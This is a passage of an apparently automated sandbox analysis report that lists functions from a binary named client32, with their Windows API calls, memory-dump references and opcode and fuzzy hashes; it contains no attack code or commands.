                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LongPropWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2492497586-0
                                                                                                                              • Opcode ID: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
                                                                                                                              • Instruction ID: 1c745b1653fd3e8b3091c37bbb53d0f4b243916ecd5e1758ad18f1d63e851998
                                                                                                                              • Opcode Fuzzy Hash: c21c60cc47c8b8f98d029afb4ec14b55cd060e124069d68dfb3cc30e1ab93e6f
                                                                                                                              • Instruction Fuzzy Hash: 24018C762003259BD3308F5AE844FA7FBFCEB91335F00862AF57582A80C3B9A451DB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                                                              • SetRect.USER32 ref: 111430A9
                                                                                                                              • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$RectText
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4034337308-0
                                                                                                                              • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                              • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                                                              • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                                                              • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111103D0 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,775E8BD0,00000000,111F1590,?,110CD955,00000000,775E8BD0), ref: 111103E8
                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,775FA6D0,00000000,?,110CD955,00000000,775E8BD0), ref: 11110408
                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,775FA6D0,00000000,?,110CD955,00000000,775E8BD0), ref: 1111041C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2905768538-0
                                                                                                                              • Opcode ID: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                                                                              • Instruction ID: 4c724308613bea48e6bb16f63c046e4f2304003fe7903f8ffd3459ebd8414c8e
                                                                                                                              • Opcode Fuzzy Hash: 8fd22b812c8f62b715523e5f86df3aaa2cd2768748401e5e8898e20f481cbd2c
                                                                                                                              • Instruction Fuzzy Hash: 73F0623665112CEFD305DFA5D9849AEB7A8FB99316B10417AF925C7900E630A905CBF0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AtomDeleteGlobal$LongWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 964255742-0
                                                                                                                              • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                              • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                                                              • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                                                              • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110820F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11081C50: IsDBCSLeadByte.KERNEL32(00000000,?,00000000,11081E2A,?,0000005C), ref: 11081C6C
                                                                                                                              • CompareStringA.KERNEL32(00000400,00000000,00000000,?,?,?), ref: 110822FB
                                                                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                              • _strncmp.LIBCMT ref: 1108232F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCompareLeadString__isdigit_l_strncmp
                                                                                                                              • String ID: {-.
                                                                                                                              • API String ID: 3286074029-1528367491
                                                                                                                              • Opcode ID: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                                                                              • Instruction ID: 42614cb2d1b9d3b778ecc90c9d3306305cb73528e675c69c4a583d3e5576a220
                                                                                                                              • Opcode Fuzzy Hash: 4d8afa05ddccc26e401f41977dd92a764ff12fedfb38d6d86dda50b79b2d366f
                                                                                                                              • Instruction Fuzzy Hash: 227179A4D0C2D76AEB02CEB44C5036EBFDD8F95208F1881FAECD887241E672D655D3A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • CreateWindowExA.USER32 ref: 110073A7
                                                                                                                              • SetFocus.USER32(?), ref: 11007403
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                                              • String ID: edit
                                                                                                                              • API String ID: 1305092643-2167791130
                                                                                                                              • Opcode ID: a2692a5bc10132aa4916f4e49fd50fbc6e885ae9e0d4d14c5f5b07e2859ec606
                                                                                                                              • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                                                              • Opcode Fuzzy Hash: a2692a5bc10132aa4916f4e49fd50fbc6e885ae9e0d4d14c5f5b07e2859ec606
                                                                                                                              • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                                                              • _memmove.LIBCMT ref: 11009336
                                                                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                              • String ID: string too long
                                                                                                                              • API String ID: 2168136238-2556327735
                                                                                                                              • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                              • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                                                              • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                                                              • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                              • String ID: string too long
                                                                                                                              • API String ID: 256744135-2556327735
                                                                                                                              • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                              • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                                                              • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                                                              • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                              • String ID: string too long
                                                                                                                              • API String ID: 963545896-2556327735
                                                                                                                              • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                              • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                                                              • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                                              • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemText
                                                                                                                              • String ID: ...
                                                                                                                              • API String ID: 3367045223-440645147
                                                                                                                              • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                                              • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                                                              • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                                              • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegQueryValueExA.ADVAPI32(00020019,?,00000000,30AC22AD,00000000,00020019,?,00000000), ref: 110ED600
                                                                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
